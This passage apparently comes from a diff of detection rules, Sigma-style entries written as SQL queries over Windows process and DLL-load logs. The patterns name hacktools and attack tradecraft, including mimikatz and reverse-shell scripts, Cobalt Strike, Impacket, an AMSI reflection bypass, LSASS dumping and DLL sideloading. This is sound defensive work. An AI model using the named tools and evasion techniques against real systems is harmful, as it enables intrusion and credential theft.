"id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE 
'%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName 
LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE 
'%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": 
"image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - 
"attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' 
ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": 
"image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": 
"proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - 
"filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName 